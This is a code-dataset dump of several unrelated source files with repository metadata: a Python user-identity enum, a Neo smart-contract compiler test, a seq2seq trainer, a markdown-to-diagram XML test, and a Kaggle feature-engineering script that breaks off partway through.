Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
practice_platform_backend/account/__init__.py
Jamison-Chen/practice_platform_backend
860b2e3bd7d57eb7db0e98f5fdda29565951e532
[ "MIT" ]
null
null
null
class UserIdentity: QUISHOP_STAFF = "QUISHOP_STAFF" TENANT_STAFF = "TENANT_STAFF" CUSTOMER = "CUSTOMER" CHOICES = [ (QUISHOP_STAFF, QUISHOP_STAFF), (TENANT_STAFF, TENANT_STAFF), (CUSTOMER, CUSTOMER), ]
24.6
39
0.634146
23
246
6.434783
0.304348
0.324324
0.432432
0.324324
0.837838
0.837838
0.837838
0.837838
0.837838
0.837838
0
0
0.264228
246
9
40
27.333333
0.81768
0
0
0
0
0
0.134146
0
0
0
0
0
0
1
0
false
0
0
0
0.555556
0
1
0
0
null
1
1
1
1
1
1
1
1
1
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
12
40393a9e51f6ec065a5bc48f6b56f61da47a3d96
96
py
Python
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
25
2020-07-22T19:37:43.000Z
2022-03-08T03:23:55.000Z
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
419
2020-04-23T17:48:14.000Z
2022-03-31T13:17:45.000Z
boa3_test/test_sc/interop_test/policy/IsBlockedTooFewArguments.py
hal0x2328/neo3-boa
6825a3533384cb01660773050719402a9703065b
[ "Apache-2.0" ]
15
2020-05-21T21:54:24.000Z
2021-11-18T06:17:24.000Z
from boa3.builtin.interop.policy import is_blocked def main() -> int: return is_blocked()
16
50
0.729167
14
96
4.857143
0.857143
0.264706
0
0
0
0
0
0
0
0
0
0.0125
0.166667
96
5
51
19.2
0.8375
0
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
true
0
0.333333
0.333333
1
0
1
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
1
0
1
1
1
0
0
8
40452005f52f1a39ebf3f380e923e3a865da5e43
9,413
py
Python
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
3
2021-02-18T10:40:29.000Z
2022-01-28T10:20:54.000Z
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
8
2020-11-13T19:00:13.000Z
2022-02-10T02:10:28.000Z
unify_eval/training/seq2seq/seq2seq_trainer.py
goesslfabian/unify-eval
ced486e44ca57ed31b552fd20b53cae61015e486
[ "Apache-2.0" ]
1
2021-06-23T12:37:12.000Z
2021-06-23T12:37:12.000Z
from random import shuffle from typing import List, Union from unify_eval.model.deep_model import DeepModel from unify_eval.model.mixins.sequences.language_models import LayeredLanguageModel from unify_eval.training.callback import TrainerCallback from unify_eval.training.seq2seq.seq2seq_data import Seq2SeqData from unify_eval.training.trainer import Trainer from unify_eval.utils.load_data import KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader class Seq2SeqModelTrainer(Trainer): """ Same as Trainer, but resets model state between calls """ def __init__(self, data_loader: Union[KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader], minibatch_callbacks: List[TrainerCallback], batch_callbacks: List[TrainerCallback], text_kw: str = "texts"): super().__init__(data_loader, minibatch_callbacks, batch_callbacks) self.text_kw = text_kw def train_on_minibatch(self, model: LayeredLanguageModel, keyed_minibatch: dict, i_minibatch: int, iteration: int, backprop_length: int = 150, minibatch_size: int = 64, **kwargs) -> DeepModel: tokenized_texts = model.preprocessing.tokenizer.tokenize_all( texts=list(keyed_minibatch.pop(self.text_kw))) # shuffle texts shuffle(tokenized_texts) lm_data = Seq2SeqData.generate_stateful_lm_data( sequence_mapper=model.preprocessing.sequence_mapper, tokenized_texts=tokenized_texts, minibatch_size=minibatch_size, backprop_length=backprop_length) model.train_mode() with model: model.train(data=lm_data, **keyed_minibatch, **kwargs) model.eval_mode() for call_back in self.minibatch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, **keyed_minibatch, **kwargs, minibatch_size=minibatch_size, backprop_length=backprop_length) call_back.global_step += 1 model.reset() return model def train_on_full_batch(self, model: LayeredLanguageModel, minibatch_size: int, iteration: int, progress_bar: bool = True, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> DeepModel: 
print(f"training iteration {iteration}") i_minibatch = 0 for i_minibatch, minibatch in enumerate(self.data_loader.yield_minibatches(minibatch_size=text_batch_size, progress_bar=progress_bar)): self.train_on_minibatch(model=model, keyed_minibatch=minibatch, i_minibatch=i_minibatch, iteration=iteration, backprop_length=backprop_length, minibatch_size=minibatch_size, **kwargs) model.reset() for call_back in self.batch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, minibatch_size=minibatch_size, backprop_length=backprop_length, **kwargs) call_back.global_step += 1 return model def train_model(self, model: LayeredLanguageModel, n_iterations: int, minibatch_size: int, progress_bar: bool = True, initial_iteration: int = 0, run_name: str = "run0", backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> DeepModel: print("preparing callbacks ...") for callbacks in (self.minibatch_callbacks, self.batch_callbacks): for callback in callbacks: callback.prepare_run(run_name=run_name, **kwargs) print("training ...") for iteration in range(initial_iteration, n_iterations + initial_iteration): self.train_on_full_batch(model=model, minibatch_size=minibatch_size, iteration=iteration, progress_bar=progress_bar, backprop_length=backprop_length, **kwargs) self.data_loader.reset() return model class CompSeq2SeqModelTrainer(Trainer): """ Same as Trainer, but resets model state between calls """ def __init__(self, data_loader: Union[KeyedBatchLoader, FiniteKeyedLazyDataLoader, KeyedLazyDataLoader], minibatch_callbacks: List[TrainerCallback], batch_callbacks: List[TrainerCallback], text_kw: str = "texts"): super().__init__(data_loader, minibatch_callbacks, batch_callbacks) self.text_kw = text_kw def train_on_minibatch(self, model: LayeredLanguageModel, keyed_minibatch: dict, i_minibatch: int, iteration: int, backprop_length: int = 150, minibatch_size: int = 64, **kwargs) -> LayeredLanguageModel: tokenized_texts = 
model.tokenizer.tokenize_all(texts=list(keyed_minibatch.pop(self.text_kw))) # shuffle texts shuffle(tokenized_texts) lm_data = Seq2SeqData.generate_stateful_lm_data(sequence_mapper=model.sequence_mapper, tokenized_texts=tokenized_texts, minibatch_size=minibatch_size, backprop_length=backprop_length) model.train_mode() with model: model.train(data=lm_data, **keyed_minibatch) model.eval_mode() for call_back in self.minibatch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, **keyed_minibatch, **kwargs, minibatch_size=minibatch_size, backprop_length=backprop_length) call_back.global_step += 1 model.reset() return model def train_on_full_batch(self, model: LayeredLanguageModel, minibatch_size: int, iteration: int, progress_bar: bool = True, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> LayeredLanguageModel: print(f"training iteration {iteration}") i_minibatch = 0 for i_minibatch, minibatch in enumerate(self.data_loader.yield_minibatches(minibatch_size=text_batch_size, progress_bar=progress_bar)): self.train_on_minibatch(model=model, keyed_minibatch=minibatch, i_minibatch=i_minibatch, iteration=iteration, backprop_length=backprop_length, minibatch_size=minibatch_size, **kwargs) model.reset() for call_back in self.batch_callbacks: model = call_back(model=model, iteration=iteration, i_minibatch=i_minibatch, minibatch_size=minibatch_size, backprop_length=backprop_length, **kwargs) call_back.global_step += 1 return model def train_model(self, model: LayeredLanguageModel, n_iterations: int, minibatch_size: int, progress_bar: bool = True, initial_iteration: int = 0, backprop_length: int = 150, text_batch_size: int = 10000, **kwargs) -> LayeredLanguageModel: print("training ...") for iteration in range(initial_iteration, n_iterations + initial_iteration): self.train_on_full_batch(model=model, minibatch_size=minibatch_size, iteration=iteration, progress_bar=progress_bar, backprop_length=backprop_length, **kwargs) 
self.data_loader.reset() return model
45.038278
118
0.527143
799
9,413
5.904881
0.133917
0.077151
0.04663
0.055108
0.851844
0.851844
0.851844
0.851844
0.851844
0.851844
0
0.010456
0.410709
9,413
208
119
45.254808
0.840094
0.014448
0
0.860465
0
0
0.013088
0
0
0
0
0
0
1
0.046512
false
0
0.046512
0
0.139535
0.02907
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
4075f0c2c55d14dc486cf7d317586b59195806d0
10,852
py
Python
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
markdownusm/tests/test_integration.py
kbyky/markdownusm
8d21949f80f7762bb80689e4f72b291bf76a0b2c
[ "MIT" ]
null
null
null
#!/usr/bin/env python import pytest from markdownusm.parser import MarkdownParser from markdownusm.usm import Usm from markdownusm.xml import XMLObjects @pytest.fixture def markdown(): return """ - Release1 - Release2 - Release3 - Release4 - Release5 <!-- Comment ## Comment Comment --- Comment Comment --> # Activity ## Task Story Story --- --- Story ## Task --- Story Story Story --- Story # Activity ## Task --- Story --- Story <!-- Story --> ## Task Story Story Story Story --- --- Story Story Story """ @pytest.fixture def expected(): return """ <mxfile> <diagram> <mxGraphModel dx="661" dy="316" grid="0" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0" background="#FFFFFF"> <root> <mxCell id="0"/> <mxCell id="1" parent="0"/> <mxCell value="Activity" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#1F568A;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="50.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell 
value="Task" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#3288C4;strokeColor=none;fontColor=#FFFFFF;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="130.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="290.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="290.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="610.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="690.0" width="140" height="60" as="geometry"/> 
</mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="450.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="610.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="290.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="370.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="450.0" width="140" height="60" 
as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="850.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Story" style="html=1;rounded=0;whiteSpace=wrap;fillColor=#ebf4fa;strokeColor=none;fontColor=#5F5F63;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="770.0" y="930.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release1" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="210.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release2" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="530.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell value="Release3" style="html=1;rounded=0;whiteSpace=wrap;fillColor=none;strokeColor=none;fontColor=#7B8EA0;align=left;verticalAlign=top;spacingLeft=5;spacingRight=5;shadow=1" parent="1" vertex="1"> <mxGeometry x="130.0" y="770.0" width="140" height="60" as="geometry"/> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="202.0" as="sourcePoint"/> <mxPoint x="930.0" y="202.0" 
as="targetPoint"/> </mxGeometry> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="522.0" as="sourcePoint"/> <mxPoint x="930.0" y="522.0" as="targetPoint"/> </mxGeometry> </mxCell> <mxCell style="html=1;endArrow=none;shadow=0;strokeWidth=2;strokeColor=#5F5F63" edge="1" parent="1"> <mxGeometry width="50" height="50" relative="1" as="geometry"> <mxPoint x="130.0" y="762.0" as="sourcePoint"/> <mxPoint x="930.0" y="762.0" as="targetPoint"/> </mxGeometry> </mxCell> </root> </mxGraphModel> </diagram> </mxfile> """ def test_integration(markdown, expected): parser = MarkdownParser(markdown=markdown) # Create list of dictionaries activities_list = parser.extract_activities_with_position() tasks_list = parser.extract_tasks_with_position() stories_list = parser.extract_stories_with_position() release_texts_list = parser.extract_release_texts_with_position() release_bars_list = parser.create_release_bars_with_position() # Create XML objects usm_activities = Usm(source=activities_list) usm_tasks = Usm(source=tasks_list) usm_stories = Usm(source=stories_list) usm_release_texts = Usm(source=release_texts_list) usm_release_bars = Usm(source=release_bars_list) # Create XML documents activities = usm_activities.to_activities() tasks = usm_tasks.to_tasks() stories = usm_stories.to_stories() release_texts = usm_release_texts.to_release_texts() release_bars = usm_release_bars.to_release_bars() export = XMLObjects( shapes=activities + tasks + stories + release_texts + release_bars ).render() import re pat = "<.*?>" assert re.findall(pat, export) == re.findall(pat, expected)
53.196078
221
0.667527
1,449
10,852
4.959972
0.095928
0.008348
0.037568
0.056769
0.809935
0.803256
0.801169
0.801169
0.784194
0.784194
0
0.078384
0.155916
10,852
203
222
53.458128
0.706223
0.008109
0
0.536313
0
0.290503
0.875651
0.377788
0
0
0
0
0.005587
1
0.01676
false
0
0.027933
0.011173
0.055866
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
40b115a79779c02000753ee3d28c02e1e2a404d1
127,131
py
Python
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
Dataset.py
arc144/Kaggle-Santander-Value-Prediction-Challenge
6b58ec481324d1520e241fa2f29aa76696708c96
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np from sklearn.preprocessing import MaxAbsScaler from sklearn.decomposition import TruncatedSVD, SparsePCA, FactorAnalysis from sklearn.random_projection import SparseRandomProjection from scipy.stats import ks_2samp from scipy.stats import kurtosis, skew, mode from Models import LightGBM from sklearn.model_selection import train_test_split, KFold from sklearn.cluster import KMeans from sklearn.metrics import mean_squared_error from math import sqrt def geo_mean_overflow(iterable): a = np.log(iterable) return np.exp(a.sum() / len(a)) def load_df_from_path(path): df = pd.read_csv(path, index_col=0) return df def running_mean(x, N): cumsum = np.cumsum(np.insert(x, 0, 0)) return (cumsum[N:] - cumsum[:-N]) / float(N) def compute_EMA(x, alpha): '''Compute EMA for array, x goes from newer to older''' inv_x = x[::-1] df = pd.DataFrame(inv_x) return np.squeeze(df.ewm(alpha=alpha).mean().values[-1]) def compute_TS_aggregates(df, prefix='TS'): '''Add aggregates rowise considering TS properties''' agg_df = pd.DataFrame(index=df.index) for index, row in df.iterrows(): non_zero_values = row.iloc[row.nonzero()] if non_zero_values.empty: continue non_zero_values = non_zero_values.values agg_df.at[index, '{}_non_zero_mean'.format( prefix)] = non_zero_values.mean() agg_df.at[index, '{}_non_zero_max'.format( prefix)] = non_zero_values.max() agg_df.at[index, '{}_non_zero_min'.format( prefix)] = non_zero_values.min() agg_df.at[index, '{}_non_zero_std'.format( prefix)] = np.std(non_zero_values) agg_df.at[index, '{}non_zero_median'.format(prefix)] = \ np.median(non_zero_values) agg_df.at[index, '{}_non_zero_gmean'.format(prefix)] = \ geo_mean_overflow(non_zero_values) agg_df.at[index, '{}_non_zero_skewness'.format(prefix)] = \ skew(non_zero_values) agg_df.at[index, '{}_non_zero_kurtosis'.format(prefix)] = \ kurtosis(non_zero_values) agg_df.at[index, '{}non_zero_q1'.format(prefix)] = \ np.percentile(non_zero_values, q=25) agg_df.at[index, 
'{}non_zero_q3'.format(prefix)] = \ np.percentile(non_zero_values, q=75) agg_df.at[index, '{}non_zero_log_mean'.format(prefix)] = \ np.log1p(non_zero_values).mean() agg_df.at[index, '{}non_zero_log_max'.format(prefix)] = \ np.log1p(non_zero_values).max() agg_df.at[index, '{}non_zero_log_min'.format(prefix)] = \ np.log1p(non_zero_values).min() agg_df.at[index, '{}non_zero_log_std'.format(prefix)] = \ np.log1p(np.std(non_zero_values)) agg_df.at[index, '{}non_zero_log_sum'.format(prefix)] = \ np.log1p(non_zero_values).sum() agg_df.at[index, '{}non_zero_log_median'.format(prefix)] = \ np.median(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_q1'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=25) agg_df.at[index, '{}non_zero_log_q3'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=75) agg_df.at[index, '{}non_zero_log_gmean'.format(prefix)] = \ geo_mean_overflow(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_skewness'.format(prefix)] = \ skew(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_kurtosis'.format(prefix)] = \ kurtosis(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_EMA25'.format(prefix)] = \ compute_EMA(np.log1p(non_zero_values), alpha=0.2) agg_df.at[index, '{}non_zero_EMA25'.format(prefix)] = \ compute_EMA(non_zero_values, alpha=0.2) # agg_df.at[index, '{}non_zero_EMA50'.format(prefix)] = \ # compute_EMA(non_zero_values, alpha=0.5) # agg_df.at[index, '{}non_zero_EMA75'.format(prefix)] = \ # compute_EMA(non_zero_values, alpha=0.75) for k in [5, 10]: agg_df.at[index, '{}_{}first_non_zero_mean'.format( prefix, k)] = non_zero_values[:k + 1].mean() agg_df.at[index, '{}_{}first_non_zero_max'.format( prefix, k)] = non_zero_values[:k + 1].max() agg_df.at[index, '{}_{}first_non_zero_min'.format( prefix, k)] = non_zero_values[:k + 1].min() agg_df.at[index, '{}_{}first_non_zero_std'.format( prefix, k)] = np.std(non_zero_values[:k + 1]) agg_df.at[index, '{}non_zero_median'.format(prefix, k)] = 
\ np.median(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_gmean'.format(prefix, k)] = \ geo_mean_overflow(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_skewness'.format(prefix, k)] = \ skew(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_kurtosis'.format(prefix, k)] = \ kurtosis(non_zero_values[:k + 1]) agg_df.at[index, '{}_{}first_non_zero_q1'.format(prefix, k)] = \ np.percentile(non_zero_values[:k + 1], q=25) agg_df.at[index, '{}_{}first_non_zero_q3'.format(prefix, k)] = \ np.percentile(non_zero_values[:k + 1], q=75) agg_df.at[index, '{}_{}first_non_zero_log_mean'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).mean() agg_df.at[index, '{}_{}first_non_zero_log_max'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).max() agg_df.at[index, '{}_{}first_non_zero_log_min'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).min() agg_df.at[index, '{}_{}first_non_zero_log_std'.format(prefix, k)] = \ np.log1p(np.std(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_sum'.format(prefix, k)] = \ np.log1p(non_zero_values[:k + 1]).sum() agg_df.at[index, '{}_{}first_non_zero_log_median'.format(prefix, k)] = \ np.median(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_q1'.format(prefix, k)] = \ np.percentile(np.log1p(non_zero_values[:k + 1]), q=25) agg_df.at[index, '{}_{}first_non_zero_log_q3'.format(prefix, k)] = \ np.percentile(np.log1p(non_zero_values[:k + 1]), q=75) agg_df.at[index, '{}_{}first_non_zero_log_gmean'.format(prefix, k)] = \ geo_mean_overflow(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_skewness'.format(prefix, k)] = \ skew(np.log1p(non_zero_values[:k + 1])) agg_df.at[index, '{}_{}first_non_zero_log_kurtosis'.format(prefix, k)] = \ kurtosis(np.log1p(non_zero_values[:k + 1])) # agg_df.at[index, '{}_{}non_zero_EMA25'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.25) # agg_df.at[index, 
'{}_{}non_zero_EMA50'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.50) # agg_df.at[index, '{}_{}non_zero_EMA75'.format(prefix, k)] = \ # compute_EMA(non_zero_values[:k + 1], alpha=0.75) return agg_df def compute_row_aggregates(df, prefix=''): '''Add series of aggreagates to dataset rowise''' agg_df = pd.DataFrame(index=df.index) for index, row in df.iterrows(): non_zero_values = row.iloc[row.nonzero()] if non_zero_values.empty: continue non_zero_values = non_zero_values.values agg_df.at[index, '{}_non_zero_mean'.format( prefix)] = non_zero_values.mean() agg_df.at[index, '{}_non_zero_max'.format( prefix)] = non_zero_values.max() agg_df.at[index, '{}_non_zero_min'.format( prefix)] = non_zero_values.min() agg_df.at[index, '{}_non_zero_std'.format( prefix)] = np.std(non_zero_values) agg_df.at[index, '{}_non_zero_sum'.format( prefix)] = non_zero_values.sum() agg_df.at[index, '{}non_zero_median'.format(prefix)] = \ np.median(non_zero_values) agg_df.at[index, '{}_non_zero_gmean'.format(prefix)] = \ geo_mean_overflow(non_zero_values) agg_df.at[index, '{}_non_zero_skewness'.format(prefix)] = \ skew(non_zero_values) agg_df.at[index, '{}_non_zero_kurtosis'.format(prefix)] = \ kurtosis(non_zero_values) agg_df.at[index, '{}non_zero_q1'.format(prefix)] = \ np.percentile(non_zero_values, q=25) agg_df.at[index, '{}non_zero_q3'.format(prefix)] = \ np.percentile(non_zero_values, q=75) mode_ = mode(np.around(non_zero_values, decimals=4)) agg_df.at[index, '{}_non_zero_mode'.format(prefix)] = mode_[ 0] if mode_[1] > 1 else 0 agg_df.at[index, '{}_non_zero_mode_count'.format(prefix)] = mode_[1] # LOG AGGREGATES agg_df.at[index, '{}non_zero_log_mean'.format(prefix)] = \ np.log1p(non_zero_values).mean() agg_df.at[index, '{}non_zero_log_max'.format(prefix)] = \ np.log1p(non_zero_values).max() agg_df.at[index, '{}non_zero_log_min'.format(prefix)] = \ np.log1p(non_zero_values).min() agg_df.at[index, '{}non_zero_log_std'.format(prefix)] = \ 
np.log1p(np.std(non_zero_values)) agg_df.at[index, '{}non_zero_log_sum'.format(prefix)] = \ np.log1p(non_zero_values).sum() agg_df.at[index, '{}non_zero_log_median'.format(prefix)] = \ np.median(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_q1'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=25) agg_df.at[index, '{}non_zero_log_q3'.format(prefix)] = \ np.percentile(np.log1p(non_zero_values), q=75) agg_df.at[index, '{}non_zero_log_gmean'.format(prefix)] = \ geo_mean_overflow(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_skewness'.format(prefix)] = \ skew(np.log1p(non_zero_values)) agg_df.at[index, '{}non_zero_log_kurtosis'.format(prefix)] = \ kurtosis(np.log1p(non_zero_values)) agg_df.at[index, '{}_non_zero_count'.format( prefix)] = np.count_nonzero(~np.isnan(non_zero_values)) agg_df.at[index, '{}_non_zero_fraction'.format(prefix)] = \ np.count_nonzero(~np.isnan(non_zero_values)) / \ np.count_nonzero(~np.isnan(row)) return agg_df def find_fillers(df): '''Find the filler values in cols''' u, c = np.unique(df.loc['6726fff18', :].values, return_counts=True) arg = np.argsort(c)[::-1] fillers = u[arg] return fillers class KaggleDataset(): '''Class used to load Kaggle's official datasets''' def __init__(self, train_path, test_path=None, join_dfs=False, verbose=True): self.train_path = train_path self.test_path = test_path self.verbose = verbose # Default settings, 